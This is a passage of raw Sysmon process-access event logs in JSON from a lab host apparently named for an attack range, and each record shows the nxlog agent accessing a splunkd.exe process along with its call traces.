(x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:05","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2804,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:05.178\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:05.178","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:06","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2805,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:06.181\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:06.181","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:06","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2806,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:07.185\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:07.185","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:08","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2807,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:08.188\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:08.188","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:09","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2808,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:09.192\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:09.192","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:10","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2809,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:10.195\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:10.195","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:11","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2810,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:11.199\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files 